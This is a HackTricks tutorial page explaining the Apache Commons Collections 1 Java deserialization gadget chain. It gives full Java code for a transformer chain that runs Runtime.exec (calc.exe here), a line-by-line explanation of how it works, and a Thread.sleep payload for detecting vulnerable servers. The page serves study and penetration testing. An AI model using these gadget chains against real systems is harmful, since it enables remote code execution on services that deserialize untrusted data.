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257 lines
11 KiB
Markdown
257 lines
11 KiB
Markdown
# CommonsCollection1 Payload - Java Transformers to Rutime exec() and Thread Sleep
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{% hint style="success" %}
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Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
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Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
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<details>
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<summary>Support HackTricks</summary>
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* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
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* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
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* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
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</details>
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{% endhint %}
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## Java Transformers to Rutime exec()
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In several places you can find a java deserialization payload that uses transformers from Apache common collections like the following one:
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```java
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import org.apache.commons.*;
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import org.apache.commons.collections.*;
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import org.apache.commons.collections.functors.*;
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import org.apache.commons.collections.map.*;
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import java.io.*;
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import java.lang.reflect.InvocationTargetException;
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import java.util.Map;
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import java.util.HashMap;
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public class CommonsCollections1PayloadOnly {
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public static void main(String... args) {
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String[] command = {"calc.exe"};
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final Transformer[] transformers = new Transformer[]{
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new ConstantTransformer(Runtime.class), //(1)
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new InvokerTransformer("getMethod",
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new Class[]{ String.class, Class[].class},
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new Object[]{"getRuntime", new Class[0]}
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), //(2)
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new InvokerTransformer("invoke",
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new Class[]{Object.class, Object[].class},
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new Object[]{null, new Object[0]}
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), //(3)
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new InvokerTransformer("exec",
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new Class[]{String.class},
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command
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) //(4)
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};
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ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
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Map map = new HashMap<>();
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Map lazyMap = LazyMap.decorate(map, chainedTransformer);
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//Execute gadgets
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lazyMap.get("anything");
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}
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}
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```
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If you don't know anything about java deserialization payloads could be difficult to figure out why this code will execute a calc.
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First of all you need to know that a **Transformer in Java** is something that **receives a class** and **transforms it to a different one**.\
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Also it's interesting to know that the **payload** being **executed** here is **equivalent** to:
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```java
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Runtime.getRuntime().exec(new String[]{"calc.exe"});
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```
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Or **more exactly**, what is going to be executed at the end would be:
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```java
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((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});
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```
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### How
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So, how is the first payload presented equivalent to those "simple" one-liners?
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**First** of all, you can notice in the payload that a **chain (array) of transforms are created**:
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```java
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String[] command = {"calc.exe"};
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final Transformer[] transformers = new Transformer[]{
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//(1) - Get gadget Class (from Runtime class)
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new ConstantTransformer(Runtime.class),
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//(2) - Call from gadget Class (from Runtime class) the function "getMetod" to obtain "getRuntime"
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new InvokerTransformer("getMethod",
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new Class[]{ String.class, Class[].class},
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new Object[]{"getRuntime", new Class[0]}
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),
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//(3) - Call from (Runtime) Class.getMethod("getRuntime") to obtain a Runtime oject
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new InvokerTransformer("invoke",
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new Class[]{Object.class, Object[].class},
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new Object[]{null, new Object[0]}
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),
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//(4) - Use the Runtime object to call exec with arbitrary commands
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new InvokerTransformer("exec",
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new Class[]{String.class},
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command
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)
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};
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ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
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```
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If you read the code you will notice that if you somehow chains the transformation of the array you could be able to execute arbitrary commands.
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So, **how are those transforms chained?**
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```java
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Map map = new HashMap<>();
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Map lazyMap = LazyMap.decorate(map, chainedTransformer);
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lazyMap.get("anything");
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```
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In the last section of the payload you can see that a **Map object is created**. Then, the function `decorate` is executed from `LazyMap` with the map object and the chained transformers. From the following code you can see that this will cause the **chained transformers** to be copied inside `lazyMap.factory` attribute:
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```java
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protected LazyMap(Map map, Transformer factory) {
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super(map);
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if (factory == null) {
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throw new IllegalArgumentException("Factory must not be null");
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}
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this.factory = factory;
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}
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```
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And then the great finale is executed: `lazyMap.get("anything");`
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This is the code of the `get` function:
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```java
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public Object get(Object key) {
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if (map.containsKey(key) == false) {
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Object value = factory.transform(key);
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map.put(key, value);
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return value;
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}
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return map.get(key);
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}
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```
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And this is the code of the `transform` function
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```java
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public Object transform(Object object) {
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for (int i = 0; i < iTransformers.length; i++) {
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object = iTransformers[i].transform(object);
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}
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return object;
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}
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```
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So, remember that inside **factory** we had saved **`chainedTransformer`** and inside of the **`transform`** function we are **going through all those transformers chained** and executing one after another. The funny thing, is that **each transformer is using `object`** **as input** and **object is the output from the last transformer executed**. Therefore, **all the transforms are chained executing the malicious payload**.
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### Summary
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At the end, due to how is lazyMap managing the chained transformers inside the get method, it's like if we were executing the following code:
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```java
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Object value = "someting";
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value = new ConstantTransformer(Runtime.class).transform(value); //(1)
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value = new InvokerTransformer("getMethod",
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new Class[]{ String.class, Class[].class},
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new Object[]{"getRuntime", null}
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).transform(value); //(2)
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value = new InvokerTransformer("invoke",
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new Class[]{Object.class, Object[].class},
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new Object[]{null, new Object[0]}
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).transform(value); //(3)
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value = new InvokerTransformer("exec",
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new Class[]{String.class},
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command
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).transform(value); //(4)
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```
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_Note how `value` is the input of each transform and the output of the previous transform , allowing the execution of a one-liner:_
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```java
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((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});
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```
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Note that here it **was explained the gadgets** used for the **ComonsCollections1** payload. But it's left **how all this starts it's executing**. You can see [here that **ysoserial**](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java), in order to execute this payload, uses an `AnnotationInvocationHandler` object because **when this object gets deserialized**, it will **invoke** the `payload.get()` function that will **execute the whole payload**.
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## Java Thread Sleep
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This payload could be **handy to identify if the web is vulnerable as it will execute a sleep if it is**.
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```java
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import org.apache.commons.*;
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import org.apache.commons.collections.*;
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import org.apache.commons.collections.functors.*;
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import org.apache.commons.collections.map.*;
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import java.io.*;
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import java.lang.reflect.InvocationTargetException;
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import java.net.MalformedURLException;
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import java.net.URL;
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import java.util.Map;
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import java.util.HashMap;
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public class CommonsCollections1Sleep {
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public static void main(String... args) {
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final Transformer[] transformers = new Transformer[]{
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new ConstantTransformer(Thread.class),
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new InvokerTransformer("getMethod",
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new Class[]{
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String.class, Class[].class
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},
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new Object[]{
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"sleep", new Class[]{Long.TYPE}
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}),
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new InvokerTransformer("invoke",
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new Class[]{
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Object.class, Object[].class
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}, new Object[]
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{
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null, new Object[] {7000L}
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}),
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};
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ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
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Map map = new HashMap<>();
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Map lazyMap = LazyMap.decorate(map, chainedTransformer);
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//Execute gadgets
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lazyMap.get("anything");
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}
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}
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```
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## More Gadgets
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You can find more gadgets here: [https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html](https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html)
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##
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{% hint style="success" %}
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Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
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|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
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* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
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</details>
|
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{% endhint %}
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